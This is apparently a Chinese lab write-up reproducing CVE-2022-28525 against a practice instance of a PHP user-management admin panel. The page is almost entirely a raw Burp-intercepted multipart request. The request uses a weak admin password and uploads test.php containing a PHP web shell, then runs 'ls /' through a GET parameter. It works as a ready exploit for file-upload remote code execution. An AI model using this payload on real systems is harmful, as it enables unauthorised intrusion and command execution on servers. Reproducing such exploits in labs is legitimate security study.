幽离知识库Appearance
CVE-2022-28525漏洞复现
打开页面,使用弱口令进去管理页面,在查看所有用户信息的界面选择编辑,输入好密码后上传一张图片,然后burp进行截包,修改包的数据如下:
POST /admin/users.php?source=edit_user&id=41 HTTP/1.1
Host: eci-2ze7imrqnzyoh14zc2sz.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------396960047138329295911294569074
Content-Length: 1611
Origin: http://eci-2ze7imrqnzyoh14zc2sz.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2ze7imrqnzyoh14zc2sz.cloudeci1.ichunqiu.com/admin/users.php?source=edit_user&id=41
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1677721269,1677725166,1677727413; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1677740305; PHPSESSID=h0o3im4t5hfjvfhp41utjdv3qf
Upgrade-Insecure-Requests: 1
-----------------------------396960047138329295911294569074
Content-Disposition: form-data; name="user_id"
41
-----------------------------396960047138329295911294569074
Content-Disposition: form-data; name="user_uname"
admin
-----------------------------396960047138329295911294569074
Content-Disposition: form-data; name="user_email"
admin@aaa.com
-----------------------------396960047138329295911294569074
Content-Disposition: form-data; name="user_pass1"
admin
-----------------------------396960047138329295911294569074
Content-Disposition: form-data; name="user_pass2"
admin
-----------------------------396960047138329295911294569074
Content-Disposition: form-data; name="user_fname"
admin
-----------------------------396960047138329295911294569074
Content-Disposition: form-data; name="user_lname"
admin
-----------------------------396960047138329295911294569074
Content-Disposition: form-data; name="user_image"
new
-----------------------------396960047138329295911294569074
Content-Disposition: form-data; name="new_image"; filename="test.php"
Content-Type: application/octet-stream
shell!<?php system($_GET[l]);?>
-----------------------------396960047138329295911294569074
Content-Disposition: form-data; name="user_role"
Administrator
-----------------------------396960047138329295911294569074
Content-Disposition: form-data; name="user_status"
Active
-----------------------------396960047138329295911294569074
Content-Disposition: form-data; name="updateusersubmit"
-----------------------------396960047138329295911294569074--
然后上传,再回到原来的界面,发现图片未正常显示,我们可以查看图片地址,直接访问,然后执行命令 ?l=ls /